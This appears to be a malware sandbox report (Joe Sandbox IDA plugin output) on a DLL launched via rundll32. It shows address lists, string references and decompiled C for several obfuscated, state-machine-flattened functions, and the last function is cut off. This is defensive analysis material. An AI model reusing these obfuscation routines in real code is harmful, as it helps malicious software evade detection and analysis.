0x10010b38
0x10010b40
0x10010b45
0x10010b4d
0x10010b55
0x10010b62
0x10010b66
0x10010b6e
0x10010b76
0x10010b7e
0x10010b83
0x10010b8b
0x10010b93
0x10010b9b
0x10010ba0
0x10010ba8
0x10010bb0
0x10010bb7
0x10010bb7
0x10010bb7
0x10010bbb
0x10010bbf
0x10010bbf
0x10010bc5
0x00000000
0x00000000
0x10010bcb
0x10010bcb
0x10010d1a
0x10010d57
0x10010d5c
0x10010d61
0x10010d87
0x10010d63
0x10010d63
0x10010d6a
0x10010d6c
0x10010d6e
0x10010d70
0x10010d71
0x10010d79
0x10010d7d
0x10010d7d
0x00000000
0x10010bd1
0x10010bd7
0x10010cbf
0x10010cc2
0x10010cc7
0x10010cc7
0x10010ccd
0x10010cd8
0x10010ce1
0x10010ce3
0x10010ce8
0x00000000
0x00000000
0x10010cf1
0x10010cf1
0x10010cf7
0x10010cfa
0x10010cfe
0x10010d03
0x10010d0a
0x00000000
0x10010bdd
0x10010be3
0x10010c5a
0x10010c8d
0x10010c92
0x10010c96
0x10010c9b
0x10010ca1
0x10010ca2
0x00000000
0x10010ca8
0x10010caa
0x10010cb0
0x00000000
0x10010cb0
0x10010be5
0x10010beb
0x10010c46
0x00000000
0x10010bed
0x10010bf3
0x10010e6a
0x10010e70
0x10010e9c
0x00000000
0x10010e9c
0x00000000
0x10010bf9
0x10010c16
0x10010c1e
0x10010c23
0x10010c28
0x10010c30
0x10010c36
0x10010c36
0x10010c3a
0x10010c3e
0x10010c40
0x10010bbf
0x10010bbf
0x10010bc5
0x00000000
0x00000000
0x00000000
0x10010bc5
0x00000000
0x10010bbf
0x10010bf3
0x10010beb
0x10010be3
0x10010bd7
0x10010d9d
0x10010da3
0x10010e28
0x10010e30
0x10010e37
0x00000000
0x10010e37
0x10010dab
0x10010db7
0x00000000
0x10010dbd
0x10010dff
0x10010e04
0x10010e09
0x10010e11
0x00000000
0x10010e11
0x10010db7
0x10010e77
0x10010e80
0x10010e94
0x00000000
0x10010e99
0x10010ead
0x10010d91
0x10010d97
0x10010e5a
0x10010e5f
0x10010e62
0x10010e69
0x00000000
0x10010e69
0x00000000
0x10010d97
0x10010bbf

Strings

`(5p, xrefs: 10010A37
g\, xrefs: 10010B1E
NC, xrefs: 1001070F
~, xrefs: 10010B76
1:, xrefs: 10010C16
bS, xrefs: 100109D1
.U, xrefs: 100106EB
H, xrefs: 100109B0
sQ, xrefs: 100107CB
}, xrefs: 10010756
S~, xrefs: 100108AD
H, xrefs: 100108A2

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .U$1:$NC$S~$`(5p$bS$g\$sQ$}$~$H$H
API String ID: 0-2586239605
Opcode ID: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
Instruction ID: dc36ea8a0aec24ac7b9885ce2b919ce4aba11c0453d1abd8bba0bdbca8633019
Opcode Fuzzy Hash: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
Instruction Fuzzy Hash: 3A1222755083819FE364CF65C98AA4BBBF1FB84748F108A1CF6D98A260D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A176, Relevance: 15.3, Strings: 12, Instructions: 324
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000A176() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _t350;
				intOrPtr _t357;
				void* _t360;
				void* _t361;
				void* _t366;
				void* _t367;
				char _t375;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int* _t414;

				_t414 =  &_v708;
				_v616 = 0x2445;
				_v616 = _v616 >> 0x10;
				_v616 = _v616 ^ 1;
				_v636 = 0xeea4;
				_t367 = 0x3f32878;
				_v636 = _v636 << 0xb;
				_v636 = _v636 << 1;
				_v636 = _v636 ^ 0x0eea4100;
				_v652 = 0xe797;
				_v652 = _v652 ^ 0x321c1edf;
				_v652 = _v652 ^ 0xd996a04c;
				_v652 = _v652 ^ 0xeb8a76ce;
				_v588 = 0xdcfc;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00000f60;
				_v612 = 0x8579;
				_v612 = _v612 + 0x6109;
				_v612 = _v612 ^ 0x0000e794;
				_v648 = 0x1b6b;
				_v648 = _v648 + 0xffff6a60;
				_v648 = _v648 << 0x10;
				_v648 = _v648 ^ 0x85cb09dc;
				_v584 = 0x1ff6;
				_v584 = _v584 << 0x10;
				_v584 = _v584 ^ 0x1ff65b4e;
				_v684 = 0xbc40;
				_v684 = _v684 >> 2;
				_v684 = _v684 + 0xffffd1fb;
				_v684 = _v684 | 0x2742d37c;
				_v684 = _v684 ^ 0x2742ef01;
				_v576 = 0x685a;
				_t404 = 0x6c;
				_v576 = _v576 / _t404;
				_v576 = _v576 ^ 0x00007f72;
				_t366 = 0;
				_v708 = 0x6bcc;
				_v708 = _v708 >> 8;
				_t405 = 0x3a;
				_v708 = _v708 * 0x2a;
				_v708 = _v708 >> 7;
				_v708 = _v708 ^ 0x0000462a;
				_v692 = 0xff9b;
				_v692 = _v692 | 0x74d94da3;
				_v692 = _v692 + 0xffffcc68;
				_v692 = _v692 | 0xbe89bc47;
				_v692 = _v692 ^ 0xfed98c58;
				_v632 = 0x3226;
				_v632 = _v632 | 0x070ffe2e;
				_v632 = _v632 / _t405;
				_v632 = _v632 ^ 0x001f3575;
				_v600 = 0xa48;
				_v600 = _v600 + 0xb52e;
				_v600 = _v600 ^ 0x0000cedf;
				_v580 = 0xa18a;
				_v580 = _v580 | 0x0c5a8a6e;
				_v580 = _v580 ^ 0x0c5abff1;
				_v664 = 0xe8f;
				_t406 = 0x37;
				_v664 = _v664 / _t406;
				_t407 = 0x46;
				_v664 = _v664 / _t407;
				_v664 = _v664 ^ 0x00006dce;
				_v640 = 0x71c;
				_v640 = _v640 << 0xe;
				_t408 = 0x49;
				_v640 = _v640 * 0x34;
				_v640 = _v640 ^ 0x5c6c577c;
				_v592 = 0x33b8;
				_v592 = _v592 | 0x07d87d51;
				_v592 = _v592 ^ 0x07d84187;
				_v696 = 0xa98f;
				_v696 = _v696 << 0xf;
				_v696 = _v696 + 0xffffe799;
				_v696 = _v696 + 0xffff3d0e;
				_v696 = _v696 ^ 0x54c69949;
				_v704 = 0x7465;
				_v704 = _v704 + 0xffffe849;
				_v704 = _v704 / _t408;
				_v704 = _v704 + 0xd0f1;
				_v704 = _v704 ^ 0x0000e434;
				_v596 = 0x236f;
				_v596 = _v596 | 0xc5dcb8d9;
				_v596 = _v596 ^ 0xc5dcb094;
				_v644 = 0x8021;
				_v644 = _v644 ^ 0xc828a343;
				_v644 = _v644 >> 3;
				_v644 = _v644 ^ 0x190550b3;
				_v604 = 0xfe6;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00002a8f;
				_v668 = 0x55eb;
				_v668 = _v668 | 0x71753889;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x5d5f3da4;
				_v608 = 0x70d4;
				_v608 = _v608 << 0xf;
				_v608 = _v608 ^ 0x386a033c;
				_v624 = 0xcf56;
				_t409 = 0x3d;
				_v624 = _v624 / _t409;
				_v624 = _v624 | 0x0bd4b4ae;
				_v624 = _v624 ^ 0x0bd4d1b6;
				_v660 = 0x16e5;
				_t410 = 0x36;
				_v660 = _v660 * 0x41;
				_v660 = _v660 / _t410;
				_v660 = _v660 ^ 0x0000307e;
				_v700 = 0xe2b6;
				_v700 = _v700 + 0x5bb5;
				_v700 = _v700 + 0xffff6142;
				_v700 = _v700 + 0x6e4e;
				_v700 = _v700 ^ 0x000141ab;
				_v656 = 0xb40;
				_v656 = _v656 + 0xffff4f1f;
				_v656 = _v656 ^ 0x21083a9e;
				_v656 = _v656 ^ 0xdef717ac;
				_v672 = 0x17c4;
				_v672 = _v672 | 0x21da6493;
				_t411 = 0x13;
				_v672 = _v672 / _t411;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 ^ 0x691fea24;
				_v620 = 0x1ec3;
				_v620 = _v620 | 0x77b1d73c;
				_v620 = _v620 + 0xffffec92;
				_v620 = _v620 ^ 0x77b1dc68;
				_v628 = 0x112b;
				_t403 = _v616;
				_v628 = _v628 * 0x73;
				_v628 = _v628 << 0xd;
				_v628 = _v628 ^ 0xf6ca7d12;
				_v680 = 0x3092;
				_v680 = _v680 * 0x68;
				_v680 = _v680 << 1;
				_v680 = _v680 + 0xfffffa86;
				_v680 = _v680 ^ 0x00277106;
				_v676 = 0x2780;
				_v676 = _v676 ^ 0x4b6da339;
				_v676 = _v676 * 0x7a;
				_v676 = _v676 << 0xe;
				_v676 = _v676 ^ 0x500a8000;
				_v688 = 0x8ae7;
				_v688 = _v688 | 0x8dfab5cc;
				_v688 = _v688 * 0x18;
				_v688 = _v688 | 0x52f27c13;
				_v688 = _v688 ^ 0x5ff3fe78;
				do {
					while(_t367 != 0x3ba1fc4) {
						if(_t367 == 0x3f32878) {
							_t367 = 0x26bd27de;
							continue;
						} else {
							if(_t367 == 0x20bf73ca) {
								_push(0x10001000);
								_push(_v684);
								E100163BF(E1001BF25(_v648, _v584, __eflags), __eflags, _v708, _v692,  &_v524,  *0x100221b0, _v632,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v600);
								E1001C5F7(_v580, _v664, _v640, _v592, _t351);
								_t414 =  &(_t414[0xb]);
								_t367 = 0x3ba1fc4;
								continue;
							} else {
								if(_t367 == 0x24e637ac) {
									_t357 = _v568;
									_t375 = _v572;
									_v560 = _t357;
									_v552 = _t357;
									_v544 = _t357;
									_v536 = _t357;
									_v532 = _v676;
									_v564 = _t375;
									_v556 = _t375;
									_v548 = _t375;
									_v540 = _t375;
									_t360 = E1000BFA7(_v624, _t375, _v660, _v700,  &_v564, _t403, _v656);
									_t414 =  &(_t414[6]);
									_t367 = 0x2e72accb;
									__eflags = _t360;
									_t361 = 1;
									_t366 =  !=  ? _t361 : _t366;
									continue;
								} else {
									if(_t367 == 0x26bd27de) {
										E10012092(_v652,  &_v572, _v588, _v612);
										_t367 = 0x2c000c16;
										continue;
									} else {
										if(_t367 == 0x2c000c16) {
											_v572 = _v572 - E100023BC();
											_t367 = 0x20bf73ca;
											asm("sbb [esp+0x9c], edx");
											continue;
										} else {
											if(_t367 != 0x2e72accb) {
												goto L18;
											} else {
												E100078F0(_t403, _v672, _v620, _v628, _v680);
											}
										}
									}
								}
							}
						}
						L9:
						return _t366;
					}
					_t350 = E1000492A(_v688, _v616, _v696, _v704, _v596, _t367, _v636, _v644, _t367,  &_v524, 0, _v604, _v668, _v608);
					_t403 = _t350;
					_t414 =  &(_t414[0xc]);
					__eflags = _t350 - 0xffffffff;
					if(__eflags == 0) {
						_t367 = 0x1fc7849e;
						goto L18;
					} else {
						_t367 = 0x24e637ac;
						continue;
					}
					goto L9;
					L18:
					__eflags = _t367 - 0x1fc7849e;
				} while (__eflags != 0);
				goto L9;
			}

0x1000a176
0x1000a180
0x1000a18a
0x1000a190
0x1000a196
0x1000a19e
0x1000a1a3
0x1000a1a8
0x1000a1ac
0x1000a1b4
0x1000a1bc
0x1000a1c4
0x1000a1cc
0x1000a1d4
0x1000a1df
0x1000a1e7
0x1000a1f2
0x1000a1fa
0x1000a202
0x1000a20a
0x1000a212
0x1000a21a
0x1000a21f
0x1000a227
0x1000a232
0x1000a23a
0x1000a245
0x1000a24d
0x1000a252
0x1000a25a
0x1000a262
0x1000a26a
0x1000a27e
0x1000a283
0x1000a28c
0x1000a297
0x1000a299
0x1000a2a1
0x1000a2ab
0x1000a2ae
0x1000a2b2
0x1000a2b7
0x1000a2bf
0x1000a2c7
0x1000a2cf
0x1000a2d7
0x1000a2df
0x1000a2e7
0x1000a2ef
0x1000a2ff
0x1000a303
0x1000a30b
0x1000a316
0x1000a321
0x1000a32c
0x1000a337
0x1000a342
0x1000a34d
0x1000a359
0x1000a35e
0x1000a368
0x1000a36d
0x1000a373
0x1000a37b
0x1000a383
0x1000a38d
0x1000a390
0x1000a394
0x1000a39c
0x1000a3a7
0x1000a3b2
0x1000a3bd
0x1000a3c5
0x1000a3ca
0x1000a3d2
0x1000a3da
0x1000a3e2
0x1000a3ea
0x1000a3fa
0x1000a3fe
0x1000a406
0x1000a40e
0x1000a419
0x1000a424
0x1000a42f
0x1000a437
0x1000a43f
0x1000a444
0x1000a44c
0x1000a454
0x1000a459
0x1000a461
0x1000a469
0x1000a471
0x1000a476
0x1000a47e
0x1000a486
0x1000a48b
0x1000a493
0x1000a49f
0x1000a4a4
0x1000a4aa
0x1000a4b2
0x1000a4ba
0x1000a4c7
0x1000a4ca
0x1000a4d6
0x1000a4da
0x1000a4e2
0x1000a4ea
0x1000a4f2
0x1000a4fa
0x1000a502
0x1000a50a
0x1000a512
0x1000a51a
0x1000a522
0x1000a52a
0x1000a532
0x1000a53e
0x1000a541
0x1000a54a
0x1000a553
0x1000a55b
0x1000a563
0x1000a56b
0x1000a573
0x1000a57b
0x1000a588
0x1000a58c
0x1000a590
0x1000a595
0x1000a59d
0x1000a5aa
0x1000a5ae
0x1000a5b2
0x1000a5ba
0x1000a5c2
0x1000a5ca
0x1000a5d7
0x1000a5db
0x1000a5e0
0x1000a5e8
0x1000a5f0
0x1000a5fd
0x1000a601
0x1000a609
0x1000a611
0x1000a611
0x1000a623
0x1000a7c7
0x00000000
0x1000a629
0x1000a62f
0x1000a749
0x1000a74e
0x1000a799
0x1000a7b5
0x1000a7ba
0x1000a7bd
0x00000000
0x1000a635
0x1000a637
0x1000a6c4
0x1000a6cb
0x1000a6d2
0x1000a6d9
0x1000a6e0
0x1000a6e7
0x1000a6f6
0x1000a70a
0x1000a715
0x1000a71c
0x1000a723
0x1000a72f
0x1000a734
0x1000a737
0x1000a73c
0x1000a740
0x1000a741
0x00000000
0x1000a63d
0x1000a643
0x1000a6b3
0x1000a6ba
0x00000000
0x1000a645
0x1000a64b
0x1000a685
0x1000a68c
0x1000a691
0x00000000
0x1000a64d
0x1000a653
0x00000000
0x1000a659
0x1000a66b
0x1000a670
0x1000a653
0x1000a64b
0x1000a643
0x1000a637
0x1000a62f
0x1000a676
0x1000a67f
0x1000a67f
0x1000a80e
0x1000a813
0x1000a815
0x1000a818
0x1000a81b
0x1000a824
0x00000000
0x1000a81d
0x1000a81d
0x00000000
0x1000a81d
0x00000000
0x1000a829
0x1000a829
0x1000a829
0x00000000

Strings

o#, xrefs: 1000A40E
Zh, xrefs: 1000A26A
Nn, xrefs: 1000A4FA
4, xrefs: 1000A406
a, xrefs: 1000A1FA
*F, xrefs: 1000A2B7
~0, xrefs: 1000A4DA
&2, xrefs: 1000A2E7
|Wl\, xrefs: 1000A394
E$, xrefs: 1000A180
H, xrefs: 1000A30B
U, xrefs: 1000A461

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: a$&2$*F$4$E$$H$Nn$Zh$o#$|Wl\$~0$U
API String ID: 0-3924455481
Opcode ID: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
Instruction ID: 30a98e3762f80b306428089b8d4b001a67ddc991bb08abca52d42ae898d556aa
Opcode Fuzzy Hash: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
Instruction Fuzzy Hash: 61F113715083819FE368CF25C989A4BBBF1FBC5758F108A1DF299862A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100193C9, Relevance: 15.3, Strings: 12, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100193C9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				unsigned int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t291;
				void* _t297;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				void* _t347;
				signed int* _t351;

				_t351 =  &_v1168;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x516598;
				_v1108 = 0x3b16;
				_v1108 = _v1108 * 0x74;
				_t347 = 0x311804be;
				_v1108 = _v1108 ^ 0xd50e416f;
				_v1108 = _v1108 ^ 0xd514c4cb;
				_v1084 = 0x7213;
				_v1084 = _v1084 + 0xffff1ce9;
				_v1084 = _v1084 ^ 0xffffb376;
				_v1076 = 0x942d;
				_v1076 = _v1076 + 0x8243;
				_v1076 = _v1076 ^ 0x00015e40;
				_v1160 = 0xefc2;
				_v1160 = _v1160 + 0xffff37ee;
				_v1160 = _v1160 ^ 0xc712f7cb;
				_t301 = 0x1e;
				_v1160 = _v1160 / _t301;
				_v1160 = _v1160 ^ 0x06a2c559;
				_v1168 = 0x8bc8;
				_v1168 = _v1168 >> 0xd;
				_v1168 = _v1168 << 0xd;
				_t302 = 0xb;
				_v1168 = _v1168 * 0x79;
				_v1168 = _v1168 ^ 0x003cfea4;
				_v1092 = 0xa545;
				_v1092 = _v1092 >> 9;
				_v1092 = _v1092 ^ 0x00005d7c;
				_v1140 = 0xa869;
				_v1140 = _v1140 + 0x7fc8;
				_v1140 = _v1140 / _t302;
				_v1140 = _v1140 ^ 0x00006e61;
				_v1116 = 0x2c70;
				_v1116 = _v1116 << 0xf;
				_v1116 = _v1116 << 6;
				_v1116 = _v1116 ^ 0x8e00790e;
				_v1068 = 0x820b;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00020295;
				_v1052 = 0x1207;
				_t303 = 0x11;
				_v1052 = _v1052 * 0x74;
				_v1052 = _v1052 ^ 0x00087ea5;
				_v1072 = 0x355d;
				_v1072 = _v1072 << 8;
				_v1072 = _v1072 ^ 0x00352c0b;
				_v1080 = 0x10d0;
				_v1080 = _v1080 << 0xd;
				_v1080 = _v1080 ^ 0x021a6542;
				_v1088 = 0x6c30;
				_v1088 = _v1088 >> 8;
				_v1088 = _v1088 ^ 0x00000016;
				_v1152 = 0xa8ea;
				_v1152 = _v1152 >> 0xf;
				_v1152 = _v1152 + 0xb411;
				_v1152 = _v1152 + 0x3cf;
				_v1152 = _v1152 ^ 0x0000e46f;
				_v1096 = 0x75ec;
				_v1096 = _v1096 + 0xffff70cd;
				_v1096 = _v1096 ^ 0xfffffc52;
				_v1104 = 0x93ae;
				_v1104 = _v1104 / _t303;
				_v1104 = _v1104 + 0xffff015e;
				_v1104 = _v1104 ^ 0xffff7730;
				_v1056 = 0xbdf9;
				_v1056 = _v1056 ^ 0xd4f8d9ff;
				_v1056 = _v1056 ^ 0xd4f80819;
				_v1128 = 0xf240;
				_v1128 = _v1128 + 0xffffadf5;
				_t304 = 0x6e;
				_v1128 = _v1128 * 0x47;
				_v1128 = _v1128 ^ 0x002c66a2;
				_v1060 = 0xbfc0;
				_v1060 = _v1060 >> 3;
				_v1060 = _v1060 ^ 0x00003168;
				_v1164 = 0xfebb;
				_v1164 = _v1164 + 0xffff52f0;
				_v1164 = _v1164 / _t304;
				_t305 = 0x5a;
				_v1164 = _v1164 / _t305;
				_v1164 = _v1164 ^ 0x00003ceb;
				_v1136 = 0x6ebb;
				_v1136 = _v1136 >> 0xe;
				_v1136 = _v1136 << 0xe;
				_v1136 = _v1136 ^ 0x00005f7f;
				_v1120 = 0xe73f;
				_v1120 = _v1120 ^ 0x98e7fdaf;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0xc7388f6f;
				_v1112 = 0x84f4;
				_v1112 = _v1112 | 0xf7194f1a;
				_v1112 = _v1112 + 0xffffc2ac;
				_v1112 = _v1112 ^ 0xf719aa5d;
				_v1156 = 0x76fc;
				_v1156 = _v1156 + 0xffff5f4d;
				_v1156 = _v1156 + 0xffffa6b8;
				_v1156 = _v1156 + 0xd873;
				_v1156 = _v1156 ^ 0x000078a0;
				_v1124 = 0x47e1;
				_t306 = 0x21;
				_v1124 = _v1124 / _t306;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x000072fc;
				_v1148 = 0x5566;
				_v1148 = _v1148 + 0xffff28de;
				_t307 = 0x31;
				_v1148 = _v1148 * 0x4f;
				_v1148 = _v1148 << 8;
				_v1148 = _v1148 ^ 0xd7f6da53;
				_v1132 = 0xf4f2;
				_v1132 = _v1132 << 3;
				_v1132 = _v1132 + 0x5d4f;
				_v1132 = _v1132 ^ 0x00082308;
				_v1100 = 0x806a;
				_v1100 = _v1100 >> 9;
				_v1100 = _v1100 / _t307;
				_v1100 = _v1100 ^ 0x00006f90;
				_v1144 = 0x33d6;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 | 0x773178e8;
				_v1144 = _v1144 ^ 0x7731353c;
				_v1064 = 0x1023;
				_v1064 = _v1064 + 0x46cd;
				_v1064 = _v1064 ^ 0x00001a8d;
				_t291 = E10014237();
				do {
					while(_t347 != 0x7d8ec07) {
						if(_t347 == 0x1eca11d1) {
							return E10013D7C( &_v520, __eflags, _v1144, _v1064,  &_v1040);
						}
						if(_t347 == 0x311804be) {
							_t347 = 0x7d8ec07;
							continue;
						}
						_t357 = _t347 - 0x3581d11e;
						if(_t347 != 0x3581d11e) {
							goto L8;
						}
						_push(0x10001050);
						_push(_v1056);
						_t297 = E1001BF25(_v1096, _v1104, _t357);
						E100164EC(E10017B6B(), _t357, _t297, _v1164, 0x104,  *0x100221b0 + 0x10,  *0x100221b0 + 0x234, _v1136, _v1120, _v1112);
						_t291 = E1001C5F7(_v1156, _v1124, _v1148, _v1132, _t297);
						_t351 =  &(_t351[0xd]);
						_t347 = 0x1eca11d1;
					}
					_push(0x10001000);
					_push(_v1168);
					E100163BF(E1001BF25(_v1076, _v1160, __eflags), __eflags, _v1140, _v1116,  &_v1040,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1052);
					_t291 = E1001C5F7(_v1072, _v1080, _v1088, _v1152, _t292);
					_t351 =  &(_t351[0xb]);
					_t347 = 0x3581d11e;
					L8:
					__eflags = _t347 - 0x3fe593;
				} while (__eflags != 0);
				return _t291;
			}

0x100193c9
0x100193cf
0x100193d6
0x100193de
0x100193ef
0x100193f3
0x100193f8
0x10019400
0x10019408
0x10019410
0x10019418
0x10019420
0x10019428
0x10019430
0x10019438
0x10019440
0x10019448
0x10019456
0x1001945b
0x10019461
0x10019469
0x10019471
0x10019476
0x10019480
0x10019483
0x10019487
0x1001948f
0x10019497
0x1001949c
0x100194a4
0x100194ac
0x100194bc
0x100194c0
0x100194c8
0x100194d0
0x100194d5
0x100194da
0x100194e2
0x100194ea
0x100194ef
0x100194f7
0x1001950a
0x1001950b
0x10019512
0x1001951d
0x10019525
0x1001952a
0x10019532
0x1001953a
0x1001953f
0x10019547
0x1001954f
0x10019554
0x10019559
0x10019561
0x10019566
0x1001956e
0x10019576
0x1001957e
0x10019586
0x1001958e
0x10019596
0x100195a4
0x100195a8
0x100195b2
0x100195ba
0x100195c5
0x100195d0
0x100195db
0x100195e3
0x100195f2
0x100195f5
0x100195f9
0x10019601
0x1001960c
0x10019614
0x1001961f
0x10019627
0x10019637
0x1001963f
0x10019644
0x1001964a
0x10019652
0x1001965a
0x1001965f
0x10019664
0x1001966c
0x10019674
0x1001967c
0x10019681
0x10019689
0x10019691
0x10019699
0x100196a1
0x100196a9
0x100196b1
0x100196b9
0x100196c1
0x100196c9
0x100196d1
0x100196dd
0x100196e2
0x100196e8
0x100196ed
0x100196f5
0x100196fd
0x1001970a
0x1001970b
0x1001970f
0x10019714
0x1001971c
0x10019724
0x10019729
0x10019731
0x10019739
0x10019741
0x1001974c
0x10019750
0x10019758
0x10019760
0x10019765
0x1001976a
0x10019772
0x1001977a
0x10019782
0x1001978a
0x1001979a
0x100197ae
0x100197ae
0x100197b8
0x00000000
0x10019900
0x100197c4
0x10019852
0x00000000
0x10019852
0x100197ca
0x100197cc
0x00000000
0x00000000
0x100197d2
0x100197d7
0x100197e6
0x1001982d
0x10019843
0x10019848
0x1001984b
0x1001984b
0x10019859
0x1001985e
0x100198a9
0x100198c8
0x100198cd
0x100198d0
0x100198d2
0x100198d2
0x100198d2
0x00000000

Strings

<, xrefs: 1001964A
0l, xrefs: 10019547
?, xrefs: 1001966C
o, xrefs: 10019576
u, xrefs: 1001957E
p,, xrefs: 100194C8
an, xrefs: 100194C0
G, xrefs: 100196D1
<51w, xrefs: 10019772
O], xrefs: 10019729
]5, xrefs: 1001951D
h1, xrefs: 10019614

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
API String ID: 0-3006474019
Opcode ID: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
Instruction ID: ac942b02fd569ebf8a703113eda67409e276ddad1249719e751fe3bc4d0fd9ab
Opcode Fuzzy Hash: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
Instruction Fuzzy Hash: 71D111715087819FE368CF24C98954BBBE1FBC4748F208A1CF5D59A2A0D7B5D989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10006BC0, Relevance: 15.3, Strings: 12, Instructions: 252
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10006BC0() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _t254;
				intOrPtr _t256;
				intOrPtr _t258;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t299;
				char _t303;
				signed int* _t304;
				void* _t306;

				_t304 =  &_v116;
				_v56 = 0x84b9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 + 0x5ea0;
				_v56 = _v56 ^ 0x0426650f;
				_v108 = 0x299e;
				_v108 = _v108 >> 8;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 ^ 0x000045b0;
				_v112 = 0xab11;
				_v112 = _v112 << 0x10;
				_v112 = _v112 + 0xffff3408;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xc40d3ae9;
				_v80 = 0xee41;
				_t261 = 0x22;
				_v80 = _v80 / _t261;
				_v80 = _v80 ^ 0x83f67a84;
				_t259 = 0;
				_v80 = _v80 ^ 0x83f65317;
				_t299 = 0x23ec3b81;
				_v116 = 0xfedd;
				_v116 = _v116 + 0xd1e5;
				_t262 = 0x7f;
				_v116 = _v116 / _t262;
				_v116 = _v116 << 0xc;
				_v116 = _v116 ^ 0x003ad050;
				_v44 = 0xeb09;
				_t263 = 0x2e;
				_v44 = _v44 * 0x66;
				_v44 = _v44 ^ 0x005de128;
				_v48 = 0x515a;
				_v48 = _v48 | 0x7fc990a4;
				_v48 = _v48 ^ 0x7fc9cd68;
				_v84 = 0xaabb;
				_v84 = _v84 >> 1;
				_v84 = _v84 * 0x5b;
				_v84 = _v84 ^ 0x001e5e5d;
